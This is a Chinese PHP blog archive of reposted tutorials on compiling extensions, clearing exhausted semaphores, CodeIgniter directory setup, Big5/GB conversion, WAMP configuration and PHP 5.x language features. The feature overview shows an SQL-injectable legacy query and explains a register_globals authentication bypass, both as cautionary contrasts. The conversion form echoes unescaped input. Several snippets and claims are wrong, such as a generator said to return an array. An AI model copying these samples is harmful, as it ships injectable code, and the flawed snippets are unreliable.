存档

‘PHP编程’ 分类的存档

php安装扩展模块(curl模块)

2017年2月4日 评论已被关闭

php安装扩展模块(curl模块)

 http://www.cnblogs.com/lin1/p/5651828.html

php安装扩展模块的思路:

1,首先找到需要安装的扩展模块的目录。一般在/usr/local/php/ext目录下 但是有的模块php源码中不一定有,需要自己下载比如memcache、redis等。

2,通过phpize工具生成configure文件。

3,./configure -with-php-config=/usr/local/php/bin/php-config

4,make&&make install

5,通过/usr/local/php/bin/php -i |grep ‘extension_dir’ 找到放.so文件的目录,查看编译安装的模块是否在这个目录下面。如果是,只需在php.ini在添加extension=模块名,如果不是在则把该模块到该目录下,再在php.ini加入extension=模块名即可。一般情况下都是在extension_dir中的,至少我没看到例外。这里有点像apache扩展模块的安装 不过apache可以自动写入配置文件。

6,查看加载是否成功  /usr/local/php/bin/php -m |grep 模块名

正式开始,

1,cd 到php源码包中的ext目录下,由于我们是要扩展安装curl模块,所以我们进入到curl目录下。

执行命令  /usr/local/php/bin/phpize  可以看到有报错信息

Cannot find autoconf. Please check your autoconf installation and the $PHP_AUTOCONF environment variable. Then, rerun this script.

哦,没找到autoconf ,那就安装呗。 yum install -y autoconf   yum install -y m4  这里还需要m4这库文件。

在执行 /usr/local/php/bin/phpize   没有报错信息了。ls 一下查看是否生成了configure这个文件。

2,./configure –with-php-config=/usr/local/php/bin/php-config   又有报错信息

configure: error: Please reinstall the libcurl distribution –
easy.h should be in <curl-dir>/include/curl/

yum install -y libcurl-devel

 

3,make &&make install

 

4,我们可以看到如下提示

/usr/local/php/bin/php -i |grep ‘extension_dir’

可以发现,模块就是安装在extension_dir目录下。

5,vim /usr/local/php/etc/php.ini 找到extension=php_shmop.dll(该行下面添加如下信息)
extension=curl.so即可。

6,查看加载是否成功。

/usr/local/php/bin/php -m |grep curl

当然,我们可以重启apache服务,通过访问phpinfo()这个页面也可以查看到模块。

 

分类: PHP编程 标签:

您的浏览器不能播放当前视频,请点击此处安装Flash播放器 解决方法 精

2017年2月4日 评论已被关闭

您的浏览器不能播放当前视频,请点击此处安装Flash播放器 解决方法 精

说真的安装EduSoho程序真心不是那么容易呀。

 

服务器环境搭配好之后终于可以正常安装了,结果又出现了视频不能播放的问题,总是在上方提示:

 

您的浏览器不能播放当前视频,请点击此处安装Flash播放器

 

在官方客服kent的知道下终于解决了这个问题。

 

原因在于 服务器 php 未安装 fileinfo组件。

 

由于我是使用lnmp 一键安装包 搭建的环境 解决方法如下:

 

编译并安装fileinfo插件

 

cd /root/lnmp1.0-full/php-5.3.17/ext/fileinfo

/usr/local/php/bin/phpize

./configure –with-php-config=/usr/local/php/bin/php-config

make && make install

在PHP配置中添加fileinfo插件

 

用vim编辑器编辑/usr/local/php/etc/php.ini文件

找到 “;extension=php_bz2.dll” 这一行

在其上面添加一行:

extension = fileinfo.so

然后重启lnmp

/root/lnmp restart

 

Linux 下 PHP 扩展 cURL 编译安装

2017年2月3日 评论已被关闭

Linux 下 PHP 扩展 cURL 编译安装
http://www.cnblogs.com/suan07lai/p/5234868.html
下载 cURL http://pan.baidu.com/s/1hqrHWkG (curl-7.39.0.tar.gz) 3.98MB

解压:

tar zxvf curl-7.39.0.tar.gz
./configure –prefix=/usr/local/curl
make && make install

安装 curl 成功后,进入 php 的源码包(非php安装地址)

cd /var/soft/php-5.3.19/ext/curl
/usr/local/php/bin/phpize 注:/usr/local/php 为我的php安装目录
./configure –with-php-config=/usr/local/php/bin/php-config –with-curl=/usr/local/curl/
make && make install
成功后出现 curl.so 的所在目录

打开 php.ini 添加 extension=xxx/curl.so

重启 apache 即可。

PHP函数sem_get引起的“No space lelf on device”问题解决记录

2017年1月20日 评论已被关闭

PHP函数sem_get引起的“No space lelf on device”问题解决记录

http://hansionxu.blog.163.com/blog/static/2416981092015914533184/

1. 问题表现:

接收到告警,部分接口异常。

2. 问题追查:

首先,机器日志中忽然出现很多的flow_lock Faild to create semaphore的错误。

追查系统中的代码实现后,发现是sem_get函数引起,该函数用于根据一个key值来获取一个系统System V信号量的引用。

代码位置:

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者

我单独在指定机器上执行上述语句,发现了Warning信息:No space lelf on device,原本以为是磁盘或者内存的空间不足,实际检查后才发现是信号量被耗尽了。

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者

信号量是一种有限资源,通过Linux命令,查看系统信号量的限制数目是1024个。

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者

 

Web机器实际已经使用掉的信号量数目已经达到1024个,也就是说,可用的信号量已经被用完了。原因,已经比较明显了,就是信号量被申请使用之后,没有被释放。

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者

于是我们追查代码源头,发现确实如此,这里的sem_release是类似解锁的意思,并非释放这个信号量,真正释放的函数是sem_remove

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者

sem_release的官方文档说明:

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者

至此,找到问题所在。这个问题潜伏了很久,系统经常很长时间,累计申请了信号量而没有释放,慢慢达到1024个,最终触发该问题。

 

3. 问题解决方式:

1)使用root权限手动释放信号量,如果有多台机器,每一台都要执行。

for semid in `ipcs -s | cut -f2 -d””`; do ipcrm -s $semid; done

2)重启Apache服务,之后,信号量的使用情况,恢复到正常的数目。

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者

关键代码位置:

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者

函数ams_sem_remove会执行sem_remove的释放操作。

 

4. 问题小结:

Sem_get系列函数,通过信号量来达到类似Linux的互斥量(mutex)锁的效果,对一个内存共享对象加锁和解锁的方式,来控制并发请求数量(类似线程安全)。出问题的原因,是长期运行下,申请占用了很多个信号量,并且缺少sem_remove的释放操作。

PHP函数sem_get引起的“No space lelf on device”问题解决记录 - 徐汉彬Hansion - 技术行者
分类: PHP编程 标签:

管理你的应用程序

2017年1月11日 评论已被关闭

管理你的应用程序

http://codeigniter.org.cn/user_guide/general/managing_apps.html

默认情况下,CodeIgniter 假设你只有一个应用程序,被放置在 application/ 目录下。但是,你完全可以拥有多个程序并让 它们共享一份 CodeIgniter 。你甚至也可以对你的应用程序目录 改名,或将其移到其他的位置。

重命名应用程序目录

如果你想重命名应用程序目录,你只需在重命名之后打开 index.php 文件将 $application_folder 变量改成新的名字:

$application_folder = 'application';

移动应用程序目录

你可以将你的应用程序目录移动到除 Web 根目录之外的其他位置, 移到之后你需要打开 index.php 文件将 $application_folder 变量改成新的位置(使用 绝对路径 ):

$application_folder = '/path/to/your/application';

在一个 CodeIgniter 下运行多个应用程序

如果你希望在一个 CodeIgniter 下管理多个不同的应用程序,只需简单的 将 application 目录下的所有文件放置到每个应用程序独立的子目录下即可。

例如,你要创建两个应用程序:”foo” 和 “bar”,你可以像下面这样组织你的目录结构:

applications/foo/
applications/foo/config/
applications/foo/controllers/
applications/foo/libraries/
applications/foo/models/
applications/foo/views/
applications/bar/
applications/bar/config/
applications/bar/controllers/
applications/bar/libraries/
applications/bar/models/
applications/bar/views/

要选择使用某个应用程序时,你需要打开 index.php 文件然后设置 $application_folder 变量。例如,选择使用 “foo” 这个应用,你可以这样:

$application_folder = 'applications/foo';

注解

你的每一个应用程序都需要一个它自己的 index.php 文件来调用它, 你可以随便对 index.php 文件进行命名。

分类: PHP编程 标签:

CI框架多目录设置

2017年1月11日 评论已被关闭

CI框架多目录设置

http://blog.163.com/huangcheng13@126/blog/static/108560932013311035411/

1,设置目的,前台与后台实现独立目录管理

2.通过http://www.myci.com  访问前台,通过http://www.myci.com/admin 访问后台,

多目录的意思是指在同一个网站中有多套程序,最简单的例子就是网站的前台展示与后台管理。二者由于在网站功能中分属不同部分,通常会有不同的界面,用到images/stylesheet/javavascript基本是分开的,所以设置不同目如以下:

网站前台URL:http://www.myci.com 网站后台管理URL::http://www.myci.com/admin
CI 2.0源码下载解压后文件结构如下图,默认是只有一个目录的

CI框架多目录设置 - huangcheng - 蓝星

2、设置入口文件。因为根目录下的index.php默认是去找applcation下的controllers下的控制器,为了读取applcation/admin/controllers下的控制器,我们需要在网站根目录下新建admin文件,并将根目录下的index.php复制至此,接下来编辑此index.php,找到:

1 $system_path "system";   //改为 $system_path = "../system";
2 $application_folder="application";  //改为 $application_folder = "../application/admin";

另外此目录可能用到的css/js/images 文件夹 也可以放在新建的admin之下。

CI框架多目录设置 - huangcheng - 蓝星

第一个目标完成之后,现在通过URL http:www.//myci/admin 可以去读取当前应用程序里面配置文件中默认设置好的控制器welcome,但是对于非默认的控制器读取url就有些略长了,比如在admin/applcation/controllers里有一个login控制器(对应程序就是login类)用来显示后台登陆页面,需要通过这个url才能访问 http://www.myci/admin/index.php/login/index ,根据CI规则,如果url中不写类的方法会默认读取index()方法,所以上面这个url也可以通过http://www.myci/admin/index.php/login访问。

要实现的目标显然不是上面这个,这个URL中还有一个index.php是看着不舒服的,真正的目标是把它去掉。实现方式其实很简单,那就是通过.htaccess文件对URL重写(rewrite)。接下来在根目录下admin文件里里面创建一个.htaccess文件,内容如下:

RewriteEngine on

RewriteCond $1 !^(index\.php|images|css|js|scripts|robots\.txt)

RewriteRule ^(.*)$ /manage/index.php/$1 [L]

——————————————————————————
附,.htacess知识

官方方法:默认情况下,index.php 将被包含在你的 URL 中:example.com/index.php/news/article/my_article

你可以很容易的通过 .htaccess 文件来设置一些简单的规则删除它。下面是一个例子,使用“negative”方法将非指定内容进行重定向:

RewriteEngine on
RewriteCond $1 !^(index\\.php|images|robots\\.txt)
RewriteRule ^(.*)$ /index.php/$1 [L]

注意:如果你的项目不在根目录请把上面这一句改为:RewriteRule ^(.*)$ index.php/$1 [L]

在上面的例子中,可以实现任何非 index.php、images 和 robots.txt 的 HTTP 请求都被指向 index.php。
官方方法的问题:

1. 没有说明.htaccess文件创建到哪个目录;.htaccess文件放到index.php所在目录,一般为CodeIgniter跟目录。

2. 不用管application和system目录中的.htaccess

3. 若项目不在根目录,则需要在最后一句语句加上ci所在目录的路径,  RewriteRule ^(.*)$ /ci_dir/index.php/$1 [L]

eg. index.php文件在wwwroot\\codeigniter,wwwroot是跟目录,则最后一句改为 RewriteRule ^(.*)$ /codeigniter/index.php/$1 [L]
4. [中级] 有效删除URL中的index.php http://codeigniter.org.cn/forums/thread-15444-1-1.html 这个博客中的RewriteCond $1 !^(index\\\\.php|images|robots\\\\.txtl)最后多了一个l

5. apache一般默认都加载了重写模块,具体可以查看 Apache\\conf\\httpd.conf文件

LoadModule rewrite_module modules/mod_rewrite.so

以下内容不需要修改

<Directory />
Options FollowSymLinks
AllowOverride none
Order deny,allow
Deny from all
</Directory>

6. 不需要修改application/config/config.php中的$config[‘index_page’] = ‘index.php’;

分类: PHP编程 标签:

实现简体转繁体,繁体到转体

2016年6月6日 评论已被关闭

实现简体转繁体,繁体到转体
http://blog.csdn.net/wide288/article/details/9175295
function gb2big5($Text){
$fp = fopen(“gb-big5.table”, “r”);
$max=strlen($Text)-1;
for($i=0;$i<$max;$i++){
$h=ord($Text[$i]);
if($h>=160){
$l=ord($Text[$i+1]);
if($h==161 && $l==64){
$gb=” “;
}else{
fseek($fp,($h-160)*510+($l-1)*2);
$gb=fread($fp,2);
}
$Text[$i]=$gb[0];
$Text[$i+1]=$gb[1]; $i++;
}
}
fclose($fp);
return $Text;
}
/**************简体转繁体 end******************/
/**************繁体转简体 start******************/
function big52gb($Text){
$fp = fopen(“big5-gb.table”, “r”);
$max=strlen($Text)-1;
for($i=0;$i<$max;$i++){
$h=ord($Text[$i]);
if($h>=160){
$l=ord($Text[$i+1]);
if($h==161 && $l==64){
$gb=” “;
}else{
fseek($fp,($h-160)*510+($l-1)*2);
$gb=fread($fp,2);
}
$Text[$i]=$gb[0];
$Text[$i+1]=$gb[1];
$i++;
}
}
fclose($fp);
return $Text;
}
/**************繁体转简体 end******************/
测试:
if(isset($_POST[“rrff”])){
echo “<a href=big2togb.php>back</a><br>”;
echo big52gb($_POST[a]);
if($query) echo “OK”;
}
else {
echo “<meta http-equiv=Content-Type content=text/html; charset=big5>”;
echo “<form action=”big2togb.php” method=”post”>”;
echo “<textarea name=a cols=80 rows=20></textarea>”;
echo “<input type=submit name=rrff value=big5-gb>”;
echo “</form>”;
}

分类: PHP编程 标签:

PHP基础知识

2016年6月1日 评论已被关闭

PHP基础知识

http://www.cnblogs.com/shyy/archive/2012/03/30/2453035.html

首先运行PHP项目,必须有的利器:

第一、服务器

wamp(我使用的版本是wamp5_1.7.4)

 

第二、开发工具

EPP(我使用的版本是EclipsePHP Studio 3)

 

修改wamp的apache默认端口80以及www目录

以修改为8088端口和D:/workphp目录为例。

<!–[if !supportLists]–>1. 修改为8088端口

左键托盘图标,在“Apache”里可以直接打开httpd.conf,查找到“Listen 80”,可以改成其他端口,我选用8088。

重启wamp,就可以生效了。但是“Localhost”、“phpMyAdmin”、“SQLiteManager”,你可以点击打开看到依旧是默认的80端口。找到wamp安装目录下的wampmanager.tpl文件,记事本打开:

在localhost后面添加8088端口,保存,退出并重新打开wamp生效。(其实,wampmanager.ini文件中的类似的URL地址也随之更改了)

 

2. 修改为D:/workphp目录

(1)需要修改Apache的httpd.conf文件,有2处修改

 

在D:/workphp目录下随便建一个txt文件,写点内容,重启Apache即在http://localhost:8088中看到,txt的内容。但是www目录依旧指向的是默认位置。这就需要修改wamp安装目录下的wampmanager.tpl和wampmanager.ini文件。

(2)wampmanager.tpl文件,修改如下

wampmanager.ini文件,修改如下

 

通过以上的修改,可以发现端口8088可以使用,而且Localhost、phpMyAdmin、SQLiteManager指向都是正确的,www目录也指向我们想设置的位置。

 

参考资料:(1)http://bbs.php100.com/read-htm-tid-48600.html

(2)http://konglx.javaeye.com/blog/507762

分类: PHP编程 标签:

PHP5各个版本的新功能和新特性总结

2016年5月27日 评论已被关闭

PHP5各个版本的新功能和新特性总结
http://www.jb51.net/article/48150.htm
因为 PHP 那“集百家之长”的蛋疼语法,加上社区氛围不好,很多人对新版本,新特征并无兴趣。本文将会介绍自 PHP5.2 起,直至 PHP5.6 中增加的新特征

本文目录:
PHP5.2 以前:autoload, PDO 和 MySQLi, 类型约束
PHP5.2:JSON 支持
PHP5.3:弃用的功能,匿名函数,新增魔术方法,命名空间,后期静态绑定,Heredoc 和 Nowdoc, const, 三元运算符,Phar
PHP5.4:Short Open Tag, 数组简写形式,Traits, 内置 Web 服务器,细节修改
PHP5.5:yield, list() 用于 foreach, 细节修改
PHP5.6: 常量增强,可变函数参数,命名空间增强
一、PHP5.2以前(2006前)
顺便介绍一下 PHP5.2 已经出现但值得介绍的特征。
autoload
大家可能都知道 __autoload() 函数,如果定义了该函数,那么当在代码中使用一个未定义的类的时候,该函数就会被调用,你可以在该函数中加载相应的类实现文件,如:

function __autoload($classname)
{
require_once(“{$classname}.php”)
}

但该函数已经不被建议使用,原因是一个项目中仅能有一个这样的 __autoload() 函数,因为 PHP 不允许函数重名。但当你使用一些类库的时候,难免会出现多个 autoload 函数的需要,于是 spl_autoload_register() 取而代之:

spl_autoload_register(function($classname)
{
require_once(“{$classname}.php”)
});

spl_autoload_register() 会将一个函数注册到 autoload 函数列表中,当出现未定义的类的时候,SPL [注] 会按照注册的倒序逐个调用被注册的 autoload 函数,这意味着你可以使用 spl_autoload_register() 注册多个 autoload 函数.
注:SPL: Standard PHP Library, 标准 PHP 库, 被设计用来解决一些经典问题(如数据结构).
PDO 和 MySQLi
即 PHP Data Object, PHP 数据对象,这是 PHP 的新式数据库访问接口。
按照传统的风格,访问 MySQL 数据库应该是这样子:

// 连接到服务器,选择数据库
$conn = mysql_connect(“localhost”, “user”, “password”);
mysql_select_db(“database”);
// 执行 SQL 查询
$type = $_POST[‘type’];
$sql = “SELECT * FROM `table` WHERE `type` = {$type}”;
$result = mysql_query($sql);
// 打印结果
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
foreach($row as $k => $v)
print “{$k}: {$v}\n”;
}
// 释放结果集,关闭连接
mysql_free_result($result);
mysql_close($conn);

为了能够让代码实现数据库无关,即一段代码同时适用于多种数据库(例如以上代码仅仅适用于MySQL),PHP 官方设计了 PDO.
除此之外,PDO 还提供了更多功能,比如:
1.面向对象风格的接口
2.SQL预编译(prepare), 占位符语法
3.更高的执行效率,作为官方推荐,有特别的性能优化
4.支持大部分SQL数据库,更换数据库无需改动代码
上面的代码用 PDO 实现将会是这样:

// 连接到数据库
$conn = new PDO(“mysql:host=localhost;dbname=database”, “user”, “password”);
// 预编译SQL, 绑定参数
$query = $conn->prepare(“SELECT * FROM `table` WHERE `type` = :type”);
$query->bindParam(“type”, $_POST[‘type’]);
// 执行查询并打印结果
foreach($query->execute() as $row)
{
foreach($row as $k => $v)
print “{$k}: {$v}\n”;
}

PDO 是官方推荐的,更为通用的数据库访问方式,如果你没有特殊需求,那么你最好学习和使用 PDO.
但如果你需要使用 MySQL 所特有的高级功能,那么你可能需要尝试一下 MySQLi, 因为 PDO 为了能够同时在多种数据库上使用,不会包含那些 MySQL 独有的功能。
MySQLi 是 MySQL 的增强接口,同时提供面向过程和面向对象接口,也是目前推荐的 MySQL 驱动,旧的C风格 MySQL 接口将会在今后被默认关闭。
MySQLi 的用法和以上两段代码相比,没有太多新概念,在此不再给出示例,可以参见 PHP 官网文档 [注]。
注:http://www.php.net/manual/en/mysqli.quickstart.php
类型约束
通过类型约束可以限制参数的类型,不过这一机制并不完善,目前仅适用于类和 callable(可执行类型) 以及 array(数组), 不适用于 string 和 int.

// 限制第一个参数为 MyClass, 第二个参数为可执行类型,第三个参数为数组
function MyFunction(MyClass $a, callable $b, array $c)
{
// …
}

PHP5.2(2006-2011):JSON 支持
包括 json_encode(), json_decode() 等函数,JSON 算是在 Web 领域非常常用的数据交换格式,可以被 JS 直接支持,JSON 实际上是 JS 语法的一部分。
JSON 系列函数,可以将 PHP 中的数组结构与 JSON 字符串进行转换:

$array = [“key” => “value”, “array” => [1, 2, 3, 4]];
$json = json_encode($array);
echo “{$json}\n”;
$object = json_decode($json);
print_r($object);

输出:

{“key”:”value”,”array”:[1,2,3,4]}
stdClass Object
(
[key] => value
[array] => Array
(
[0] => 1
[1] => 2
[2] => 3
[3] => 4
)
)

值得注意的是 json_decode() 默认会返回一个对象而非数组,如果需要返回数组需要将第二个参数设置为 true.
PHP5.3(2009-2012)
PHP5.3 算是一个非常大的更新,新增了大量新特征,同时也做了一些不向下兼容的修改。
【PHP5.3弃用的功能】:以下几个功能被弃用,若在配置文件中启用,则 PHP 会在运行时发出警告。
Register Globals
这是 php.ini 中的一个选项(register_globals), 开启后会将所有表单变量($_GET和$_POST)注册为全局变量.
看下面的例子:

if(isAuth())
$authorized = true;
if($authorized)
include(“page.php”);

这段代码在通过验证时,将 $authorized 设置为 true. 然后根据 $authorized 的值来决定是否显示页面.
但由于并没有事先把 $authorized 初始化为 false, 当 register_globals 打开时,可能访问 /auth.php?authorized=1 来定义该变量值,绕过身份验证。
该特征属于历史遗留问题,在 PHP4.2 中被默认关闭,在 PHP5.4 中被移除。
Magic Quotes
对应 php.ini 中的选项 magic_quotes_gpc, 这个特征同样属于历史遗留问题,已经在 PHP5.4 中移除。
该特征会将所有用户输入进行转义,这看上去不错,在第一章我们提到过要对用户输入进行转义。
但是 PHP 并不知道哪些输入会进入 SQL , 哪些输入会进入 Shell, 哪些输入会被显示为 HTML, 所以很多时候这种转义会引起混乱。
Safe Mode
很多虚拟主机提供商使用 Safe Mode 来隔离多个用户,但 Safe Mode 存在诸多问题,例如某些扩展并不按照 Safe Mode 来进行权限控制。
PHP官方推荐使用操作系统的机制来进行权限隔离,让Web服务器以不同的用户权限来运行PHP解释器,请参见第一章中的最小权限原则.
【PHP5.3的新增、改进】
匿名函数
也叫闭包(Closures), 经常被用来临时性地创建一个无名函数,用于回调函数等用途。

$func = function($arg)
{
print $arg;
};
$func(“Hello World”);

以上代码定义了一个匿名函数,并赋值给了 $func.
可以看到定义匿名函数依旧使用 function 关键字,只不过省略了函数名,直接是参数列表。
然后我们又调用了 $func 所储存的匿名函数。
匿名函数还可以用 use 关键字来捕捉外部变量:

function arrayPlus($array, $num)
{
array_walk($array, function(&$v) use($num){
$v += $num;
});
}

上面的代码定义了一个 arrayPlus() 函数(这不是匿名函数), 它会将一个数组($array)中的每一项,加上一个指定的数字($num).
在 arrayPlus() 的实现中,我们使用了 array_walk() 函数,它会为一个数组的每一项执行一个回调函数,即我们定义的匿名函数。
在匿名函数的参数列表后,我们用 use 关键字将匿名函数外的 $num 捕捉到了函数内,以便知道到底应该加上多少。
魔术方法:__invoke(), __callStatic()
PHP 的面向对象体系中,提供了若干“魔术方法”,用于实现类似其他语言中的“重载”,如在访问不存在的属性、方法时触发某个魔术方法。
随着匿名函数的加入,PHP 引入了一个新的魔术方法 __invoke().
该魔术方法会在将一个对象作为函数调用时被调用:

class A
{
public function __invoke($str)
{
print “A::__invoke(): {$str}”;
}
}
$a = new A;
$a(“Hello World”);

输出毫无疑问是:

A::__invoke(): Hello World

__callStatic() 则会在调用一个不存在的静态方法时被调用。

命名空间
PHP的命名空间有着前无古人后无来者的无比蛋疼的语法:

<?php
// 命名空间的分隔符是反斜杠,该声明语句必须在文件第一行。
// 命名空间中可以包含任意代码,但只有 **类, 函数, 常量** 受命名空间影响。
namespace XXOO\Test;
// 该类的完整限定名是 \XXOO\Test\A , 其中第一个反斜杠表示全局命名空间。
class A{}
// 你还可以在已经文件中定义第二个命名空间,接下来的代码将都位于 \Other\Test2 .
namespace Other\Test2;
// 实例化来自其他命名空间的对象:
$a = new \XXOO\Test\A;
class B{}
// 你还可以用花括号定义第三个命名空间
namespace Other {
// 实例化来自子命名空间的对象:
$b = new Test2\B;
// 导入来自其他命名空间的名称,并重命名,
// 注意只能导入类,不能用于函数和常量。
use \XXOO\Test\A as ClassA
}

更多有关命名空间的语法介绍请参见官网 [注].
命名空间时常和 autoload 一同使用,用于自动加载类实现文件:

spl_autoload_register(
function ($class) {
spl_autoload(str_replace(“\\”, “/”, $class));
}
);
当你实例化一个类 \XXOO\Test\A 的时候,这个类的完整限定名会被传递给 autoload 函数,autoload 函数将类名中的命名空间分隔符(反斜杠)替换为斜杠,并包含对应文件。
这样可以实现类定义文件分级储存,按需自动加载。
注:http://www.php.net/manual/zh/language.namespaces.php
后期静态绑定
PHP 的 OPP 机制,具有继承和类似虚函数的功能,例如如下的代码:

class A
{
public function callFuncXXOO()
{
print $this->funcXXOO();
}
public function funcXXOO()
{
return “A::funcXXOO()”;
}
}
class B extends A
{
public function funcXXOO()
{
return “B::funcXXOO”;
}
}
$b = new B;
$b->callFuncXXOO();

输出是:

B::funcXXOO

可以看到,当在 A 中使用 $this->funcXXOO() 时,体现了“虚函数”的机制,实际调用的是 B::funcXXOO().
然而如果将所有函数都改为静态函数:

class A
{
static public function callFuncXXOO()
{
print self::funcXXOO();
}
static public function funcXXOO()
{
return “A::funcXXOO()”;
}
}
class B extends A
{
static public function funcXXOO()
{
return “B::funcXXOO”;
}
}
$b = new B;
$b->callFuncXXOO();

情况就没这么乐观了,输出是:

A::funcXXOO()

这是因为 self 的语义本来就是“当前类”,所以 PHP5.3 给 static 关键字赋予了一个新功能:后期静态绑定:

class A
{
static public function callFuncXXOO()
{
print static::funcXXOO();
}
// …
}
// …

这样就会像预期一样输出了:

B::funcXXOO
Heredoc 和 Nowdoc
PHP5.3 对 Heredoc 以及 Nowdoc 进行了一些改进,它们都用于在 PHP 代码中嵌入大段字符串。
Heredoc 的行为类似于一个双引号字符串:

$name = “MyName”;
echo <<< TEXT
My name is “{$name}”.
TEXT;

Heredoc 以三个左尖括号开始,后面跟一个标识符(TEXT), 直到一个同样的顶格的标识符(不能缩进)结束。
就像双引号字符串一样,其中可以嵌入变量。
Heredoc 还可以用于函数参数,以及类成员初始化:

var_dump(<<<EOD
Hello World
EOD
);
class A
{
const xx = <<< EOD
Hello World
EOD;
public $oo = <<< EOD
Hello World
EOD;
}

Nowdoc 的行为像一个单引号字符串,不能在其中嵌入变量,和 Heredoc 唯一的区别就是,三个左尖括号后的标识符要以单引号括起来:

$name = “MyName”;
echo <<< ‘TEXT’
My name is “{$name}”.
TEXT;

输出:

My name is “{$name}”.
用 const 定义常量
PHP5.3 起同时支持在全局命名空间和类中使用 const 定义常量。
旧式风格:

define(“XOOO”, “Value”);

新式风格:
const XXOO = “Value”;
const 形式仅适用于常量,不适用于运行时才能求值的表达式:

// 正确
const XXOO = 1234;
// 错误
const XXOO = 2 * 617;
三元运算符简写形式
旧式风格:

echo $a ? $a : “No Value”;

可简写成:

echo $a ?: “No Value”;

即如果省略三元运算符的第二个部分,会默认用第一个部分代替。
Phar
Phar即PHP Archive, 起初只是Pear中的一个库而已,后来在PHP5.3被重新编写成C扩展并内置到 PHP 中。
Phar用来将多个 .php 脚本打包(也可以打包其他文件)成一个 .phar 的压缩文件(通常是ZIP格式)。
目的在于模仿 Java 的 .jar, 不对,目的是为了让发布PHP应用程序更加方便。同时还提供了数字签名验证等功能。
.phar 文件可以像 .php 文件一样,被PHP引擎解释执行,同时你还可以写出这样的代码来包含(require) .phar 中的代码:

require(“xxoo.phar”);
require(“phar://xxoo.phar/xo/ox.php”);

更多信息请参见官网 [注].
注:http://www.php.net/manual/zh/phar.using.intro.php
PHP5.4(2012-2013)
Short Open Tag
Short Open Tag 自 PHP5.4 起总是可用。
在这里集中讲一下有关 PHP 起止标签的问题。即:

<?php
// Code…
?>

通常就是上面的形式,除此之外还有一种简写形式:

<? /* Code… */ ?>

还可以把

<?php echo $xxoo;?>

简写成:

<?= $xxoo;?>

这种简写形式被称为 Short Open Tag, 在 PHP5.3 起被默认开启,在 PHP5.4 起总是可用。
使用这种简写形式在 HTML 中嵌入 PHP 变量将会非常方便。
对于纯 PHP 文件(如类实现文件), PHP 官方建议顶格写起始标记,同时 省略 结束标记。
这样可以确保整个 PHP 文件都是 PHP 代码,没有任何输出,否则当你包含该文件后,设置 Header 和 Cookie 时会遇到一些麻烦 [注].
注:Header 和 Cookie 必须在输出任何内容之前被发送。
数组简写形式
这是非常方便的一项特征!

// 原来的数组写法
$arr = array(“key” => “value”, “key2” => “value2”);
// 简写形式
$arr = [“key” => “value”, “key2” => “value2”];
Traits
所谓Traits就是“构件”,是用来替代继承的一种机制。PHP中无法进行多重继承,但一个类可以包含多个Traits.

// Traits不能被单独实例化,只能被类所包含
trait SayWorld
{
public function sayHello()
{
echo ‘World!’;
}
}
class MyHelloWorld
{
// 将SayWorld中的成员包含进来
use SayWorld;
}
$xxoo = new MyHelloWorld();
// sayHello() 函数是来自 SayWorld 构件的
$xxoo->sayHello();

Traits还有很多神奇的功能,比如包含多个Traits, 解决冲突,修改访问权限,为函数设置别名等等。
Traits中也同样可以包含Traits. 篇幅有限不能逐个举例,详情参见官网 [注].
注:http://www.php.net/manual/zh/language.oop5.traits.php
内置 Web 服务器
PHP从5.4开始内置一个轻量级的Web服务器,不支持并发,定位是用于开发和调试环境。
在开发环境使用它的确非常方便。

php -S localhost:8000

这样就在当前目录建立起了一个Web服务器,你可以通过 http://localhost:8000/ 来访问。
其中localhost是监听的ip,8000是监听的端口,可以自行修改。
很多应用中,都会进行URL重写,所以PHP提供了一个设置路由脚本的功能:

php -S localhost:8000 index.php

这样一来,所有的请求都会由index.php来处理。
你还可以使用 XDebug 来进行断点调试。
细节修改
PHP5.4 新增了动态访问静态方法的方式:

$func = “funcXXOO”;
A::{$func}();

新增在实例化时访问类成员的特征:

(new MyClass)->xxoo();

新增支持对函数返回数组的成员访问解析(这种写法在之前版本是会报错的):

print func()[0];
PHP5.5(2013起)
yield
yield关键字用于当函数需要返回一个迭代器的时候, 逐个返回值。

function number10()
{
for($i = 1; $i <= 10; $i += 1)
yield $i;
}

该函数的返回值是一个数组:

[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

list() 用于 foreach
可以用 list() 在 foreach 中解析嵌套的数组:

$array = [
[1, 2, 3],
[4, 5, 6],
];
foreach ($array as list($a, $b, $c))
echo “{$a} {$b} {$c}\n”;

结果:

1 2 3
4 5 6

细节修改
不推荐使用 mysql 函数,推荐使用 PDO 或 MySQLi, 参见前文。
不再支持Windows XP.
可用 MyClass::class 取到一个类的完整限定名(包括命名空间)。
empty() 支持表达式作为参数。
try-catch 结构新增 finally 块。
PHP5.6
更好的常量
定义常量时允许使用之前定义的常量进行计算:

const A = 2;
const B = A + 1;
class C
{
const STR = “hello”;
const STR2 = self::STR + “, world”;
}

允许常量作为函数参数默认值:

function func($arg = C::STR2)
更好的可变函数参数
用于代替 func_get_args()

function add(…$args)
{
$result = 0;
foreach($args as $arg)
$result += $arg;
return $result;
}

同时可以在调用函数时,把数组展开为函数参数:

$arr = [2, 3];
add(1, …$arr);

// 结果为 6
命名空间
命名空间支持常量和函数:

namespace Name\Space {
const FOO = 42;
function f() { echo __FUNCTION__.”\n”; }
}
namespace {
use const Name\Space\FOO;
use function Name\Space\f;
echo FOO.”\n”;
f();
}

分类: PHP编程 标签:

PHP版本如何选择

2016年5月27日 评论已被关闭

PHP版本如何选择

http://www.3lian.com/edu/2015/05-14/212900.html

超过75%的网站使用了PHP作为开发语言,wordpress,phpmyadmin和其他一些开源项目的盛行,带来了一大批的长尾用户。然而,他们一般安装之后却很少升级。下图是目前PHP的使用统计。

惊人的是,此图的左半部分表示已经不被支持的PHP版本。PHP 5.2早在2011年1月已经不再维护。这并不意味着你就不能使用它,但是这意味着某些安全更新,你就无法跟进了。一些发行版将尝试修复一些BUG,但你的PHP版本似乎有点乏善可陈,因为,你正在使用的是2006年的过时技术。

